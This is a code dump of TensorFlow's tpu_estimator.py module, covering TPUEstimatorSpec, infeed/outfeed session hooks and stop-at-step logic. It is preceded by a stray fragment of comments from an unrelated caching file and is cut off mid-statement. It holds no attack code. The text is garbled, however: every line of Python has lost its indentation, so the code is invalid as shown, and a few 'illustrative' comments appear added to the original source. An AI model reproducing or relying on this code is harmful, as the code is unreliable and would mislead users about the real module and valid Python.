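#   block_cache : OrderedDict mapping block hash -> {method: {param_json: response}},
#                 trimmed to the 5 most recent blocks
#   cache.db    : persistent SQLite table "chain<chainid>" with columns
#                 (method, params, result), written only for LONGTERM_CACHE methods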
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import tensorflow as tf
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
# Track the adoption of TPUEstimator
_tpu_estimator_gauge = monitoring.BoolGauge(
'/tensorflow/api/tpu_estimator',
'Whether the program uses tpu estimator or not.')
if ops.get_to_proto_function('{}_{}'.format(_TPU_ESTIMATOR,
_ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
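# Illustrative behavior of the helper above (hypothetical values):
#   _is_iterable([1, 2])  # -> True
#   _is_iterable(42)      # -> False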
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or tf.compat.v1.get_default_graph()
if tf.compat.v1.train.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return tf.compat.v1.get_variable(
tf.compat.v1.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=tf.dtypes.int64,
initializer=tf.compat.v1.initializers.zeros(),
trainable=False,
use_resource=True,
collections=[
tf.compat.v1.GraphKeys.GLOBAL_VARIABLES,
tf.compat.v1.GraphKeys.GLOBAL_STEP
])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = tf.compat.v1.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(tf.compat.v1.train.get_global_step()):
with tf.compat.v1.variable_scope(
_TPU_ESTIMATOR, reuse=tf.compat.v1.AUTO_REUSE):
return tf.compat.v1.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=tf.compat.v1.initializers.zeros(),
shape=[],
dtype=tf.dtypes.int32,
trainable=False,
collections=[collection_name, tf.compat.v1.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
tf.debugging.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in tf.compat.v1.trainable_variables()
]
else:
return [tf.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases the eval step by 1 by default, so we add the remaining difference here.
return tf.compat.v1.assign_add(
eval_step,
tf.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
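# Illustrative behavior of `_extract_key_names` (hypothetical inputs):
#   _extract_key_names({'b': t1, 'a': t2})  # -> ['a', 'b'] (sorted keys)
#   _extract_key_names(single_tensor)       # -> [] (not a dict)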
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
tf.compat.v1.logging.info(msg, *args, **kw)
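# Illustrative usage sketch of `PeriodicLogger` (hypothetical call site; the
# names used below are assumptions, not part of this module):
#   status_logger = PeriodicLogger(seconds=60)
#   for step in range(num_steps):
#     status_logger.log('processed step %d', step)  # emits at most once per 60s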
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function are
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
cls._host_calls = {}
if eval_metrics is not None:
cls._host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
cls._host_calls['host_call'] = host_call
_OutfeedHostCall.validate(cls._host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, tf.compat.v1.train.SessionRunHook):
raise TypeError(
'All hooks must be SessionRunHook instances, given: {}'.format(
hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(self._host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(tf.compat.v1.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
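# Illustrative `model_fn` return sketch for the eval_metrics contract described
# above (hypothetical `metric_fn`, `labels`, `logits`, `loss`, `train_op`; not
# taken from this module):
#
#   def metric_fn(labels, logits):
#     return {'accuracy': tf.compat.v1.metrics.accuracy(
#         labels, tf.math.argmax(logits, axis=-1))}
#
#   return TPUEstimatorSpec(mode=mode, loss=loss, train_op=train_op,
#                           eval_metrics=(metric_fn, [labels, logits]))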
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
tf.compat.v1.logging.debug('%s read iterations %s', self._name,
iterations)
if iterations == _SIGNAL.STOP:
tf.compat.v1.logging.info('%s received shutdown signal, stopping.',
self._name)
return
yield iterations
def join(self):
tf.compat.v1.logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(tf.compat.v1.train.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitializing
# the TPU would cause variable corruption, since the previously allocated
# memory might be overwritten for other purposes.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
tf.compat.v1.logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [
tf.compat.v1.tpu.shutdown_system(job=self._master_job)
]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
tf.compat.v1.logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
tf.compat.v1.logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
tf.compat.v1.logging.debug('Infeed enqueue for iteration (%d, %d)',
count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
tf.compat.v1.logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
tf.compat.v1.logging.debug('Outfeed dequeue for iteration (%d, %d)',
count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
tf.compat.v1.logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
tf.compat.v1.logging.error('Compilation failed: {}'.format(
proto.status_error_message))
coord.request_stop()
else:
tf.compat.v1.logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
tf.compat.v1.logging.info('Init TPU system')
start = time.time()
with tf.Graph().as_default():
with tf.compat.v1.Session(
self._master, config=self._session_config) as sess:
sess.run(
tf.compat.v1.tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
tf.compat.v1.logging.info('Initialized TPU in %d seconds',
time.time() - start)
session.run(
self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=30 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
tf.compat.v1.logging.info(
'Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(
session, shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
tf.compat.v1.logging.info('Enqueue next (%d) batch(es) of data to infeed.',
iterations)
self._infeed_controller.send_next_batch_signal(iterations)
tf.compat.v1.logging.info(
'Dequeue next (%d) batch(es) of data from outfeed.', iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
tf.compat.v1.logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
tf.compat.v1.logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
tf.compat.v1.logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
rendezvous=None,
master=None,
session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook`, with the
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of (`value`, `unit`) that
represents either the number of iterations or the time in seconds to run
the optimizer per loop, depending on whether `unit` is `count` or
`seconds` respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError('Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit`.')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = tf.compat.v1.train.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of (`final_step` -
`global_step`) and the initial estimated iterations returned by the
estimator (which defaults to 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
tf.compat.v1.logging.info('ElapsedTime: %.3f', elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model. But it lets the
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately.
raise tf.errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
